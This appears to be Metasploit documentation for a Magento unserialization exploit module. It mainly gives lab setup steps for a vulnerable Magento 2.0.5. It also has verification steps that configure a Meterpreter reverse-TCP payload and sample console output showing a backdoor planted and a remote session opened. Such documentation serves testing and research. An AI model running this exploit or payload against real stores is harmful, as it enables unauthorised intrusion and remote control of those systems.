## Vulnerable Application

Magento is a popular open-source e-commerce platform written in PHP. An unserialization
vulnerability exists in the product that allows an unauthenticated user to gain arbitrary
code execution.

Magento Community and Enterprise editions before 2.0.6 are affected. The magento_unserialize module
was specifically tested against version 2.0.6, on Ubuntu 14.04 and Debian.

For testing purposes, you can download the vulnerable
applications [here](https://www.exploit-db.com/apps/d34a83e80f927d7336cc8ef37a9867f4-magento2-2.0.5.tar.gz).

### Install

To set up a vulnerable version of Magento, please follow these steps. This is specific to
Ubuntu 14, and assumes you are installing Magento under /var/www/html/.

1. Set up a [Ubuntu](http://www.ubuntu.com/) box.
2. Open a terminal, and enter: ```sudo apt-get install apache2```
3. Enter: ```sudo apt-get install php5```
4. Enter: ```sudo a2enmod rewrite```
5. Add the following content to /etc/apache2/sites-enabled/000-default.conf, inside the virtual block:

```
<Directory /var/www/html>
  Options Indexes FollowSymLinks MultiViews
  AllowOverride All
  Order allow,deny
  allow from all
</Directory>
```

6. Download the [vulnerable Magento app](https://www.exploit-db.com/apps/d34a83e80f927d7336cc8ef37a9867f4-magento2-2.0.5.tar.gz)
7. Extract the compressed file: ```tar -xf magento2-2.0.5.tar.gz```
8. Move the files and directories of magento2-2.0.5 to /var/www/html/ (make sure .htaccess is copied too)
9. In terminal, enter: ```sudo chmod 644 /var/www/html/.htaccess```
10. Enter: ```sudo service apache2 restart```
11. Enter: ```sudo apt-get install mysql-server-5.6```. And follow the installation instructions of MySQL.
12. Enter: ```sudo apt-get install php5-mysql```
13. Enter: ```sudo apt-get install php5-mcrypt```
14. Enter: ```sudo php5enmod mcrypt```
15. Enter: ```sudo apt-get install php5-xsl php5-curl php5-intl```
16. Enter: ```sudo service apache2 restart```
17. cd to /var/www/html, enter: ```sudo mkdir tmp```, and cd to tmp
18. In tmp, do: ```curl -sS https://getcomposer.org/installer | php```
19. Enter: ```sudo mv composer /usr/local/bin/composer```
20. In /var/www/html, do: ```composer install```
21. You will be asked for a username (public key) and password (private key). You can register
    for one here: https://marketplace.magento.com/
22. Back to terminal, enter: ```mysql -h localhost -u root -p[password]```
23. In mysql, enter: ```create database magento```, and exit
24. Go to http://localhost with a browser, and install Magento through the web interface.
25. After installation, back to Magento directory, and enter: ```sudo rm -rf var/cache/*```
26. Enter: ```sudo rm -rf var/generation/*```
27. Enter: ```sudo rm -rf var/page_cache/*```
28. cd to /var/www/html/bin
29. Enter: ```sudo php magento deploy:mode:set developer```. It should say that you're in developer mode.
30. Enter: ```sudo php magento setup:static-content:deploy```
31. Enter: ```sudo php magento indexer:reindex```
32. Enter: ```sudo chmod -R 777 /var/www/html```
33. Go to http://localhost, you should see Magento up and running.
34. From Magento, log in as admin, and create a product. After creating one, make sure this product
    is:
    * Either includes a shipping address, or does not have a weight.
    * Searchable from the front-end.

If at some point the IP (base URL) of Magento has changed, then you will need to do these steps to update:

1. From the terminal, do: ```mysql -h localhost -u [username] -p[password]```
2. In the SQL prompt, do: ```use [magento database name]```
3. Do: ```select * from core_config_data;```, you should see both web/unsecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP.
4. Do: ```update core_config_data set value='http://[IP]/' where config_id=2;```
5. Do: ```update core_config_data set value='https://[IP]/' where config_id=3;```
6. Back to the Magento directory, do: ```sudo rm -rf var/cache/*```
7. Also do: ```sudo rm -rf var/generation/*```
8. Also do: ```sudo rm -rf var/page_cache/*```
9. Browse to Magento again with the new IP, it should be up and running again.

## Verification Steps

1. Start msfconsole
2. Do: ```exploit/multi/http/magento_unserialize```
3. Do: ```set RHOST [IP]```
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp```
5. Do: ```set LHOST [IP]```
6. Do: ```exploit```
7. And you should get a session

## Options

## Scenarios

```
msf exploit(magento_unserialize) > check
[*] 192.168.1.108:80 The target appears to be vulnerable.
msf exploit(magento_unserialize) > exploit

[*] Started reverse TCP handler on 192.168.1.94:4444 
[+] 192.168.1.108:80 - generated a guest cart id
[+] 192.168.1.108:80 - backdoor done!
[*] Sending stage (33721 bytes) to 192.168.1.108
[*] Meterpreter session 6 opened (192.168.1.94:4444 -> 192.168.1.108:46835) at 2016-06-02 17:09:34 -0500
[+] 192.168.1.108:80 - Deleted lP5UgbUBLm1sWN25gWfZBqYKms.php

meterpreter > 
```
